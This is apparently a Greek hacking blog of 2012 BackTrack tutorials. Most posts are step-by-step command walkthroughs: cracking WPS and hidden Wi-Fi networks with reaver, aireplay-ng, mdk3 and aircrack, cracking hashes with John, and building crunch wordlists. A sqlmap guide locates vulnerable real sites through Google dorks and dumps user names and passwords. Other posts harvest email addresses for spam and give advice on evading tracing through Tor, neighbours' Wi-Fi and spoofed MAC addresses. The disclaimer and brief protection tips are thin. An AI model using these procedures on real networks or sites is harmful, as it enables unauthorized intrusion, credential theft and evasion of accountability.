ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Τρίτη 26 Ιουνίου 2012

Πως αναβαθμιζω απο Backtrack 5 R1,R2 σε Backtrack 5 R3

Τι θα χρειαστεις;

1.Backtrack 5 R1,R2
2.Συνδεση internet


1. Ανοιγουμε ενα τερματικο και γραφουμε 
apt-get update && apt-get dist-upgrade
2. Οταν τελειωσει γραφουμε και αυτο 
apt-get install libcrafter blueranger 
dbd inundator intersect mercury
cutycapt trixd00r artemisa rifiuti2 
netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users 
phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit 
spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor 
iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec 
websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn
binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy 
creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit 
smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
(απλα καντε το αντιγραφη επικολληση απο εδω)

Τετάρτη 25 Ιανουαρίου 2012

DVWA - Damn Vulnerable Web App

DVWA ειναι μια εφαρμογη που σας επιτρεπει να εξασκηθειτε σε SQL injection ,XSS και διαφορα σε νομιμο περιβαλλον καθως θα κανετε επιθεση στην δικια σας σελιδα  μπορειτε να δοκιμασετε το sqlmap,sqlninja,hydra,και πολλα αλλα προγραμματα εισβολης σε μια ιστοσελιδα.


Τι θα χρειαστειτε;
1.Backtrack 5R1
2.DVWA download
3.Aυτοματο scritp  download



  • οταν εχετε κατεβασει το DVWA τοτε καντε το extract στον φακελο root 
  • μετα οταν εχετε κατεβασει το Auto.script καντε το να ειναι εκτελεσιμο με δεξι κλικ properties, επιλεξτε να ειναι executable και ανοιξτε το, run in terminal.
  • μετα πηγαινετε Applications -Backtrack-Services-MySQLD-mysql start
  • τελος πητηστε εδω  http://127.0.0.1/login.php βαλτε username 'admin' και password 'password'
  • μετα πατηστε setup και create database και εχετε φτιαξει τα δεδομενα σας
  • τωρα ειστε ετοιμοι να κανετε τις εισβολες σας σε νομιμο περιβαλλον




Πέμπτη 19 Ιανουαρίου 2012

Πως βρισκω και σπαω ενα δικτυο WPA/WPA2 με WPS

Τι θα χρειαστεις;

1.Backtrack 5 R1
2.Reaver
3.WPA/WPA2 δικτυο με Wifi Protected Setup


  • Παταμε εδω και κατεβαζουμε το Reaver
  • μετα αφου το αρχειο reaver-1-3.tar.gz  εχει κατεβει και ειναι στον φακελο root ανοιγουμε ενα τερματικο και γραφουμε
  • tar zxvf reaver-1-3.tar.gz
  • μετα cd reaver-1-3
  • cd src
  • ./configure
  • make
  • make install
  • και ειμαστε ετοιμοι να αρχισουμε (αποσυνδεουμε το δικτυο μας)
  • airmon-ng start wlan0
  • walsh -i mon0 -C
  • βλεπουμε ποιο δικτυο εχει WPS σημειωνουμε την mac address , παταμε ctrl+c  και παμε με το reaver για να το σπασουμε
  • γραφουμε  reaver -i mon0 -b 00:24:40:48:99:99 -vv
  • οπου 
  • -b την mac address του δικτυου που θελουμε να σπασουμε 
  • -vv βαζουμε για να μας δειχνει λεπτομερως τι γινετε
  • αν γραψετε μονο reaver θας σας εμφανισει ολες τις επιλογες που μπορειτε να εφαρμοσετε
  • περιμενουμε και μας εμφανιζει τον κωδικο
  • αν θελετε μπορειτε να πατησετε ctrl+c και να συνεχισετε οποτε εσεις θελετε γιατι σε μερικα ρουτερ κραταει ωρες πχ οταν δοκιμαζει το reaver τους κωδικους, το ρουτερ μετα απο καποιες προσπαθειες κλειδωνει και μετα απο 5 λεπτα δεχετε αλλες προσπαθειες για κωδικους
  • Επιπλεον επιλογες του reaver που θα σας φανουν χρησιμες
  • -a βρισκει αυτοματα τις καλυτερες ρυθμισεις σπασιματος για το δικτυο
  • - l βαλτε ποσος χρονος θα ειναι η αναμονη για να ξαναπροσπαθησει το σπασιμο πχ. -l 630 * οταν σας λεει Warning AP detected limited time retrying .....εφαρμοζετε αυτη την επιλογη συνηθως πανω απο 315 δευτερα βαζετε.
  • -r βαζετε τον χρονο αναμονης στις  ποσες προσπαθειες δλδ -r 315:4 θα κανει 4 προσπαθειες και μετα θα περιμενει πεντε λεπτα και 15 δευτερα μεχρι να ξαναρχισει
  •  -t βαζετε τον χρονο αναμονης ληψης αναμεσα απο καθε προσπαθεια σπασιματος ( pin attemps) δλδ κανετε μια προσπαθεια και περιμενετε αποτελεσμα αυτο τον χρονο ρυθμιζετε οταν σας λεει waarning receive timeout occur συνηθως το αλλαζετε σε μεγαλυτερο
  • -L αγνοειτε το κλειδωμα του ρουτερ και τον χρονο αναμονης που πρεπει να περιμενετε.
  • -S στελνετε μικροτερα πακετα και επιταχυνει το χρονο του σπασιματος
  • τις επιλογες πρεπει να τις βαλετε μετα το -vv  δλδ
  • reaver -i mon0 -b <mac_address> -vv -a -l 630 -r 630:4 -t 5 -L -S κτλ..... 
  • Με αυτη την επιθεση του reaver δεν χρειαζετε να ειναι συνδεδεμενος κανενας χρηστης ουτε χρειαζονται λεξικα για να σπασει το δικτυο επισεις μπορειτε να συνεχισετε οποτε θελετε απο εκει που ειχατε μεινει.

 Πως να προστατευτειτε;

1.Απενεργοποιηστε το WPS στο ρουτερ σας

Τετάρτη 18 Ιανουαρίου 2012

Πως σπαμε Μd5/Sha1 κωδικοποιησεις με john the Ripper


Τι θα χρειαστειτε?

1.Backtrack 5 R1


  • Πρωτα αναγνωριζουμε τον κωδικο τι κωδικοποιηση εχει αν md5 η sha1
  • md5 εχουνε 32 ψηφια fd144f65f19df1c7adaa116c44ce2617 
  • sha1 εχουνε 40 ψηφια 54274c1b66e4db9103a52754b9f88c07567bd846
  • και  στα 2 ειναι κωδικοποιημενο το ονομα Nick
  • Ανοιγουμε ενα τερματικο και γραφουμε 
  •  cd /pentest/passwords/john
  • μετα john --format=raw-md5 /root/md5.txt
  • οπου 
  •  --format= βαζουμε την κωδικοποιηση
  • και /root/md5.txt το αρχειο που εχουμε αποθηκευσει τους κωδικους μεσα
  • οταν μας εμφανισει 
  • No password hashes left to crack
  • γραφουμε john --format=raw-md5  --show /root/md5.txt
  • και μας εμφανιζει τους κωδικους
      Κωδικοποιησεις  που σπαει το john the ripper
  • des/bsdi/md5/bf/afs/lm/bfegg/dmd5/dominosec/epi/hdaa/ipb2/krb4/krb5/mschapv2/mysql-fast/mysql/netlm/netlmv2/netntlm/netntlmv2/nethalflm/ssha/nsldap/md5ns/nt/openssha/phps/po/xsha/crc32/hmac-md5/lotus5/md4-gen/mediawiki/mscash/mscash2/mskrb5/mssql/mssql05/mysql-sha1/oracle11/oracle/phpass-md5/pix-md5/pkzip/raw-md4/raw-md5/raw-sha1/raw-md5u/salted-sha1/sapb/sapg/sha1-gen/trip/raw-sha224/raw-sha256/raw-sha384/raw-sha512/xsha512/hmailserver/sybasease/crypt/ssh/pdf/rar/zip/dummy/dynamic_n
* goog.li σελιδα κωδικοποιησης/αποδικoποιησης και σας βοηθαει να αναγνωρισετε τι ειδος κωδικοποιησης εχει ενας κωδικος

Πως θα σερφαρετε ανωνυμα;


Τι θα χρειαστειτε?

1.Backtrack 5 R1
2.Tor

  • Ανοιγουμε ενα τερματικο και γραφουμε 
  • lsb_release -c
  • και μας εμφανιζει τι διανομη linux εχουμε
  • πχ lucid
  • πηγαινουμε και ανοιγουμε με gedit το αρχειο /etc/apt/sources.list
  • και προσθετουμε κατω αυτη την γραμμη
  • deb     http://deb.torproject.org/torproject.org <DISTRIBUTION> main
    *οπου <destribution> μας την εμφανιζει η πρωτη εντολη που γραψαμε 
  • deb     http://deb/torproject.org/torproject.org lucid main
  • το αποθηκευουμε και το κλεινουμε
  • γραφουμε στο τερματικο
  • gpg --keyserver keys.gnupg.net --recv 886DDD89 
  • μας εμφανιζει αυτο
  • gpg: Total number processed: 1
    gpg:              unchanged: 1
  • μετα γραφουμε 
  • gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
  • μας εμφανιζει ΟΚ
  • μετα apt-get update
  • apt-get install tor tor-geoipdb
  • εχουμε εγκαταστησει το tor χωρις προβληματα παταμε εδω επιτρεπουμε να κανουμε εγκατασταση το torbutton κανουμε ενα restart του firefox και θα δουμε ενα κρεμμυδι αριστερα πανω παταμε πανω του και επιλεγουμε Toggle Tor status οταν γινει πρασινο παταμε εδω για να κοιταξουμε αν εχουμε ρυθμισει σωστα το Tor
  • επισεις μπορειτε να το ελενξετε και εδω αν λεει αλλη ip χωρας ειστε ενταξει αν λεει ip της Ελλαδας τοτε δεν ειστε ενταξει.
Προσοχη

Μερικοι χρησιμοποιουνε το Tor για επιθεσεις σε σελιδες ετσι ωστε να μην εντοπιζοντε
ο καλυτερος τροπος για να μην εντοπιστεις ειναι να χρησιμοποιεις ξενο ασυρματο δικτυο να εχεις αλλαξει την Mac addresss σου και επισεις οταν κανεις την επιθεση να μην μπεις σε καμια σελιδα με τα προσωπικα σου δεδομενα οπως Facebook,hotmail,Gmail κτλ αλλα και παλι αν ειναι να σε εντοπισουνε θα σε εντοπισουνε εφοσον εχεις διαπραξει σοβαρο αδικημα και για να το καταλαβετε σωστα πχ εγω κανω μια επιθεση σε μια σελιδα


Εγω---->tor1---->tor2----->tor3------>tor4--->σελιδα
σελιδα--->tor4--->tor3--->tor2--->tor1--->σε εμενα
δλδ η σελιδα ξερει μονο τον tor4,o tor4 τον tor3 κτλ



οποτε για να με εντοπισουνε πρεπει να βρουνε τα ιχνη του tor4 να πανε στον tor3 μετα tor2 κτλ μεχρι να φτασουνε σε εμενα και μιλαμε για μεγαλη βαση δεδομενων και αν φτασουνε σε εμενα θα φτασουνε στην isp υπηρεσια πχ forhtnet η οποια θα τους πει που ειναι το ρουτερ μου εφοσον εχω διαπραξει καποιο αδικημα αλλα εφοσον δεν ειναι δικο μου το δικτυο και κλεβω ασυρματα θα ερθουνε στην οικια του ρουτερ δλδ καπου κοντα στην γειτονια μου και θα με εντοπισουνε με την mac address μου αλλα εγω την εχω αλλαξει οποτε δεν μπορουνε να κανουνε ταυτοποιηση οτι οντως εγω εκανα την επιθεση βεβαια κανεις δεν ειναι 100% ανωνυμος στο διαδικτυο




Δευτέρα 16 Ιανουαρίου 2012

Πως να κλεβετε στοιχεια απο ιστοσελιδες (SQLmap)


Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα.

Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • παμε στο google και κανουμε αναζητηση .php?id=  gr
  • θα μας εμφανισει  ελληνικες και ξενες σελιδες που μπορει να ειναι ευαλωτες σε sql injection
  • επιλεγουμε και ανοιγουμε την σελιδα και στην url βαζουμε ' στο τελος
  • αν μας βγαλει MYSQL warning  η Mysql syntax error τοτε ειναι 100% ευαλωτη
  • *η κατεβαζετε το text αρχειο με Google Dorks download
  • το ανοιγετε κανετε αντιγραφη μια σειρας και επικοληση στην αναζητηση του Google
  • *η κατεβαζετε το  XcodeExploitScanner download
  •  οταν το εχουμε κατεβασει κανουμε extract και μετα παμε στο XcodeExploitScanner.exe δεξι κλικ και εκτελεση ως διαχειριστης
  • εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες
  • μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες
  • πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text  το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack
  • *περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google
  • Ανοιγουμε ενα τερματικο και γραφουμε
  •  cd /pentest/database/sqlmap
  • οποτε παμε στο τερματικο μας και γραφουμε 
  • ./sqlmap.py -u [url] --beep
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --beep  
  •  οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα
  • μετα γραφουμε
  • ./sqlmap.py -u [url] --dbs
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --dbs
  • θα μας εμφανισει τα Database πχ

  • available databases [6]:
    [*] dswa
    [*] dswa_stage
    [*] dswawordpress
    [*] information_schema
    [*] mysql
    [*] test 

  • ./sqlmap.py -u [url] --tables -D [database]
  •  μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --tables -D dswa

  • Database: dswa
    [104 tables]
    +-----------------------------------+
    | access                         
    | accesslog                    
    | actions                        
    | actions_aid                  
    | advanced_help_index  
    | authmap                      
    | autologout                   
    | batch                           
    | blocks                          
    | blocks_roles                
    | boxes                            
    | cache                            
    | cache_block                      
    | cache_content                    
    | cache_filter                     
    | cache_form                       
    | cache_menu                       
    | cache_page                       
    | cache_update                     
    | cache_views                      
    | cache_views_data                 
    | comments                         
    | content_access                   
    | content_field_headername         
    | content_group                    
    | content_group_fields             
    | content_node_field               
    | content_node_field_instance      
    | content_type_education_center_sub
    | content_type_find_alliance       
    | content_type_member_home_page    
    | content_type_member_page         
    | content_type_page                
    | content_type_page_ns             
    | content_type_story               
    | dswa_chapters_main               
    | dswa_chapters_persons            
    | dswa_eventuity_additional        
    | dswa_eventuity_link              
    | dswa_eventuity_main              
    | dswa_profile_additional          
    | dswa_profile_geographic          
    | dswa_profile_images              
    | dswa_profile_main                
    | dswa_store_categories            
    | dswa_store_featured              
    | dswa_store_featured_sample       
    | dswa_store_images                
    | dswa_store_product_categories    
    | dswa_store_products              
    | dswa_taq_articles                
    | dswa_taq_quotes                  
    | dswa_taq_tips                    
    | dswa_taq_topics                  
    | dswa_teleclasses_additional      
    | dswa_teleclasses_main            
    | dswa_teleclasses_speakers        
    | dswa_whatsnew_main               
    | dswa_whatsnew_order              
    | fckeditor_role                   
    | fckeditor_settings               
    | files                            
    | filter_formats                   
    | filters                          
    | flood                            
    | history                          
    | menu_custom                      
    | menu_links                       
    | menu_router                      
    | node                             
    | node_access                      
    | node_comment_statistics          
    | node_counter                     
    | node_revisions                   
    | node_type                        
    | performance_detail               
    | performance_summary              
    | permission                       
    | profile_fields                   
    | profile_values                   
    | role                             
    | search_dataset                   
    | search_index                     
    | search_node_links                
    | search_total                     
    | semaphore                        
    | sessions                         
    | system                           
    | term_data                        
    | term_hierarchy                   
    | term_node                        
    | term_relation                    
    | term_synonym                     
    | upload                           
    | url_alias                        
    | users                            
    | users_roles                      
    | variable                         
    | views_display                    
    | views_object_cache               
    | views_view                       
    | vocabulary                       
    | vocabulary_node_types            
    | watchdog                         
    +-----------------------------------+
  • ./sqlmap.py -u [url] --columns -T [table name] -D [databasename]
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --columns -T user -D dswa
  • Database: dswa
    Table: users
    [19 columns]
    +------------------+------------------+
    | Column           | Type       |
    +------------------+------------------+
    | access         | int(11)        |
    | created        | int(11)        |
    | data             | longtext     |
    | init              | varchar(64) |
    | language     | varchar(12)|
    | login            | int(11)        |
    | mail             | varchar(64)|
    | mode           | tinyint(4)   |
    | name           | varchar(60)|
    | pass            | varchar(32) |
    | picture       | varchar(255) |
    | signature    | varchar(255)|
    | signature_format | smallint(6) |
    | sort             | tinyint(4)       |
    | status          | tinyint(4)       |
    | theme          | varchar(255)|
    | threshold     | tinyint(4)     |
    | timezone     | varchar(8)  |
    | uid              | int(10) unsigned |
    +------------------+------------------+
  • ./sqlmap.py -u [url] --dump -C [column] -T [table name] -D [databasename]
  •  πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --dump  -C pass -T users -D dswa
  • πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα 
  •  ./sqlmap.py -u www.selidathyma.com./php?id=17 --dump  -C name -T users -D dswa
  • και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα
  • και ετσι κλεβετε διαφορες πληροφοριες απο μια σελιδα
  • *κακοβουλοι χρηστες κανουνε αυτη την επιθεση με την χρηση του Tor ετσι ωστε να μην εντοπιστουνε.  
  • σχετικο αρθρο που μπορει να σας βοηθησει εδω 
  • η επιλογη --tor στο sqlmap χρησιμοποιει proxy και δεν μπορουν να σας εντοπισουν την ip


Πως θα προστετευτειτε;
1.Μην κανετε εγγραφη σε ευαλωτες σελιδες γιατι με αυτο τον τροπο θα κλεψουνε ονοματα/κωδικους και διαφορα προσωπικα στοιχεια σας τα οποια μπορουνε να χρησιμοποιησουνε για να εισβαλουνε  στο συστημα σας η στην προσωπικη αλληλογραφια σας 
2.Ποτε μην βαζετε προσωπικα δεδομενα σε σελιδες

Σάββατο 14 Ιανουαρίου 2012

Πως να μαζευετε διευθυνσεις ηλεκτρονικης αλληλογραφιας

Με αυτο τον οδηγο θα σας δειξω πως θα μαζευετε διευθυνσεις ηλεκτρονικης αλληλογραφιας απο yahoo,hotmail,gmail κτλ

Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • Ανοιγω ενα τερματικο και γραφουμε msfconsole
  • back
  • use gather/search_email_collector
  • set DOMAIN hotmail.gr 
  • set outfile /root/email.txt
  • run 
  • και θα μας τα εμφανισει και θα τα αποθηκευσει στον φακελο /root σε αρχειο email.txt

  • με αυτο τον τροπο οι spammers και οι διαφημιστες συγκεντρωνουν emails και στελνουνε διαφορα



Πως θα προστατευτειτε;

1.Στο προφιλ σας βγαλτε να ειναι δημοσιο το email σας
2.Και ποτε μην βαζετε το email σας δημοσια σε forum,κοινωνικα δικτυα κτλ

Πως να επιταχυνετε το μTorrent





Τι θα χρειαστειτε;

1.Συνδεση στο ιντερνετ
2.μTorrent

  • Ανοιγουμε το μTorrent και παταμε ctrl+p και μας ανοιγει τις επιλογες 
  • πηγαινουμε συνδεση και εφαρμοζουμε τις ρυθμισεις οπως στην εικονα
  • μετα παμε Ευρος ζωνης και εφραμοζουμε τις ρυθμισεις οπως στην  κατω εικονα
  • μετα BitTorrent οπως στην εικονα
  • μετα προτεραιοτητα οπως στην εικονα κατω
  • και προχωρημενες παμε στο net.max_halfopen και βαζουμε 90 τιμη
  • Τελος .Ειμαστε ετοιμοι να κατεβαζουμε με την μεγιστη ταχυτητα που μπορουμε *οταν κατεβαζετε να κοιτατε τους seeders να ειναι περισσοτεροι απο τους leechers δλδ με απλα λογια να κοιτατε αυτους που το ανεβαζουνε να ειναι περισσοτεροι απο αυτους που το κατεβαζουνε



Τρίτη 10 Ιανουαρίου 2012

Πως θα φτιαξετε δικιες σας λιστες κωδικων για σπασιμο δικτυων


Με αυτο τον οδηγο θα μαθετε να φτιαχνετε λιστες κωδικων


Τι θα χρειαστειτε;

1.Backtrack 5 R1


  • ανοιγουμε ενα τερματικο και γραφουμε 
  • cd /pentest/passwords/crunch
  • μετα ./cruch 4 4 1234567890 -o /root/lexiko.txt
  • με αυτην την εντολη θα δημιουργησετε απο το 0000-9999
  • οπου
  • ''1234567890'' τι θα χρησιμοποιησει για να φτιαξει κωδικους
  • 4 4 το μηκος των κωδικων δλδ 4ψηφια
  • -ο /root/lexiko.txt οτι θα τα αποθηκευσει στον φακελο root σε lexiko.txt ετσι ωστε να το βρειτε ποιο ευκολα
  • ./crunch 4 4 -f charset.lst lalpha -o /root/lexiko.txt
  • με αυτη την εντολη θα δημιουργησετε απο το aaaa-zzzzz
  • οπου
  • 4 4  4ψηφια δλδ το μηκος των κωδικων
  • -f charset.lst οι χαρακτηρες μπορειτε να επιλεξετε πχ απο εδω
  • hex-lower=[0123456789abcdef]
    hex-upper=[0123456789ABCDEF]
    numeric=[0123456789]
    numeric-space=[0123456789 ]
    symbols14=[!@#$%^&*()-_+=]
    symbols14-space=[!@#$%^&*()-_+= ]
    symbols-all=[!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    symbols-all-space=[!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
    ualpha=[ABCDEFGHIJKLMNOPQRSTUVWXYZ]
    ualpha-space=[ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
    ualpha-numeric=[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
    ualpha-numeric-space=[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
    ualpha-numeric-symbol14= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
    ualpha-numeric-symbol14-space= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
    ualpha-numeric-all = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    ualpha-numeric-all-space= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
    lalpha=[abcdefghijklmnopqrstuvwxyz]
    lalpha-space=[abcdefghijklmnopqrstuvwxyz ]
    lalpha-numeric=[abcdefghijklmnopqrstuvwxyz0123456789]
    lalpha-numeric-space=[abcdefghijklmnopqrstuvwxyz0123456789 ]
    lalpha-numeric-symbol14=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=]
    lalpha-numeric-symbol14-space=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+= ]
    lalpha-numeric-all=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    lalpha-numeric-all-space=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
    mixalpha=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
    mixalpha-space=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ]
    mixalpha-numeric=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
    mixalpha-numeric-space=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
    mixalpha-numeric-symbol14=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
    mixalpha-numeric-symbol14-space= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
    mixalpha-numeric-all= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    mixalpha-numeric-all-space= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
  • πχ αν θελω να φτιαξω μια λιστα με ονομα και κωδικο οπως Nikos99 δλδ το ονομα και ημερομηνια γεννησης
  • ./crunch 7 7 -f charset.lst numeric -t Nikos%% -o /root/nikos.txt
  • και θα δημιουργησει μια λιστα απο Nikos00-Nikos99
  • οπου 7 7 το μηκους των κωδικων εφοσον το Nikos ειναι ηδη 5 και 2 τα τελευταια ψηφια θα ειναι 7
  • -f τι χαρακτηρες θα χρησιμοποιησει
  • -t την βαση που δεν θα αλλαζει και %% θα βαζει αριθμους αν @@ θα βαζει γραμματα αν ^^ θα βαζει ειδικους χαρακτηρες χαρακτηρες
  • -ο που θα αποθηκευτει
  • ./crunch 10 10 -f charset.lst numeric -t 694%%%%%%% -o /root/kinhta.txt
  • θα δημιουργησετε μια λιστα απο ολα τα κινητα 694 απο 6940000000-6949999999 η οποια θα ειναι 104.9 mb  
  • *επιπλεον επιλογες
  • -b χωριζετε σε μεγεθος δλδ αν ειναι 100mb μπορειτε να την χωρισετε σε 50mb 2 αρχεια πχ -b KB / MB / GB (πρεπει να το χρησιμοποιησετε με -o START *START ειναι το προσωρινο αρχειο που αποθηκευετε η λιστα θα την βρειτε /pentest/passwords/crunch
  • -c  χωριζετε σε γραμμες αντι για μεγεθος 100000 ειναι περιπου 1mb (-o START)
  • -e ποτε θα σταματισει πχ αν θελω να δημιουργησω απο το 00000-99999 μπορω να το σταματησω στο 33333
  • -r συνεχιζω την λιστα αν την εχω σταματησει
  • -s βαζω την λιστα μου να αρχισει απο καπου πχ ./crunch 4 4 123456789 -s 4444 θα αρχισει απο 4444 και η λιστα θα ειναι 4444-9999 
  • -z συμπιεζω την λιστα -z gzip, bzip , lzma
και ετσι φτιαχνετε τις λιστες σας

Δευτέρα 9 Ιανουαρίου 2012

Πως βρισκω και σπαω ενα κρυφο ασυρματο δικτυο


Με αυτο τον οδηγο θα μπορειτε να βρειτε το ονομα απο ενα κρυφο ασυρματο δικτυο και τον κωδικο(δεν ευθυνομαι για κακοβουλη χρηση του σε ξενα δικτυα καθως ειναι παρανομο να μοιραζεσαι το δικτυο χωρις την συγκαταθεση του ιδιοκτητη)


Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • Υπαρχουνε 2 τροποι
  • με το aireplay-ng και με το mdk3
Aireplay-ng (αν υπαρχει καποιος ηδη συνδεδεμενος)
  • οταν το ψαξουμε με το wicd network manager θα μας το εμφανισει ετσι 

  • ανοιγουμε ενα τερματικο και γραφουμε 
  • airmon-ng start wlan0
  • airodump-ng mon0 και οταν δουμε με ονομα <length:  6>δλδ εμενα το ονομα ειναι 6 γραμματα αν λεει  <lenght 3> ειναι 3 κτλ.
  • airodump-ng -w kryfo --bssid 00:1F:9F:8E:53:9B -c 1 mon0
  • οπου 
  • -w το ονομα που θα αποθηκευοντε οι πληροφοριες
  • --bssid η mac address του ασυρματου δικτυου
  • -c το καναλι που εκπεμπει το δικτυο
  • βαλαμε το airodump-ng να ακουει συγκεκριμενα σε αυτο το δικτυο
  • αν δουμε καποιον station συνδεδεμενο τοτε γραφουμε
  • aireplay-ng -0 4 -a 00:1F:9F:8E:53:9B -c 00:34:45:45:45:34 mon0
  • οπου 
  • -0 deauthentication ποσες φορες θα κανουμε
  • -a η mac address του δικτυου
  • -c η mac address του χρηστη(station)
  • οταν πιασουμε το handshake θα μας εμφανισει και το ονομα του δικτυου
  • οποτε μετα μπορουμε να συνεχισουμε το σπασιμο του δικτυου
  • για wpa απλα εφοσον εχουμε πιασει το handshake απλα γραφουμε την εντολη aircrack-ng /root/kryfo*.cap -w /root/lexika/lexiko.txt 
  • οπου 
  • -w στο φακελο οπου εχετε το λεξικο σας
Mdk3
  • γραφουμε σε ενα τερματικο airmon-ng start wlan0 *αν δεν το εχουμε ξεκινησει απο πριν
  • airodump-ng mon0 ωστε να δουμε το bssid και το καναλι του δικτυου μετα το σταματαμε με ctrl+c και παλι airodump-ng -w * --bssid * -c * mon0
  • και ανοιγουμε ενα αλλο τερματικο και γραφουμε
  • mdk3 mon0 p -b a -c 1 -t 00:1F:9F:8E:53:9B -s 1000
  • οπου p -b ειναι το σπασιμο με brutalforce για το δικτυο
  • -c το καναλι
  • -b a για ολους τους χαρακτηρες
  • -b u για κεφαλαια γραμματα
  • -b l για μικρα γραμματα
  • -b n για αριθμους
  • -t η mac address του δικτυου
  • -s ποσα πακετα θα στελνουμε (καλυτερα μην χρησιμοποιησετε αυτη την επιλογη γιατι σε ορισμενες καρτες δεν δουλευει)
  • * -f αν θελετε να κοιταει σε αρχειο.txt για τα ονοματα
  • θα σας δειξει και αλλα δικτυα που ειναι στο καναλλι  απλα αφηστε το μεχρι να τελειωσει και θα σας εμφανισει το ονομα οπως εδω

  • για wep  εχουμε ξεκινησει το airodump-ng στο συγκεκριμενο δικτυο οπως πανω γραφουμε σε ενα τερματικο aireplay-ng -1 0 -a bssid mon0
  • μετα aireplay-ng -3 -b bssid mon0 
  • *(bssid = mac address του δικτυου)
  • οταν φτασουν τα πακετα πανω απο 5000
  • ανοιγω ενα αλλο τερματικο και γραφω 
  • aircrack-ng /root/kryfo*.cap
*οταν τελειωσω και βρω κωδικο και ονομα παω στο wicd Network Manager 
παταω Network -find a hidden network γραφω το ονομα βαζω και τον κωδικο στο properties και τελος

Πως θα προστατευτειτε;

1.Να εχετε wpa2 κρυπτογραφηση στο δικτυο σας με δυσκολο κωδικο και αν θελετε μπορειτε να κρυψετε το δικτυο σας ανουσιο βεβαια αλλα θα δυσκολεψει αρκετα τον αλλον ωστε να βρει ονομα και κωδικο....
2.Καντε ενσυρματη την συνδεση σας στο διαδικτυο

Κυριακή 8 Ιανουαρίου 2012

Πως εντοπιζω ενα email

Με αυτο τον οδηγο θα σας δειξω πως να εντοπισετε τα ιχνη της φυσικης διευθυνσης απο οπου σταλθηκε το email.


Τι  θα χρειαστειτε;

1.Firefox ή IE

  • πηγαινουμε στο email μας πχ για hotmail παταω δεξι κλικ στο μηνυμα που θελω να εντοπισω και παταω εκει που λεει προβολη προελευσης μηνυματος 



  • θα σας ανοιξει μια καινουργια καρτελα οπως εδω
  • και βλεπετε προσεχτικα την ip sender 
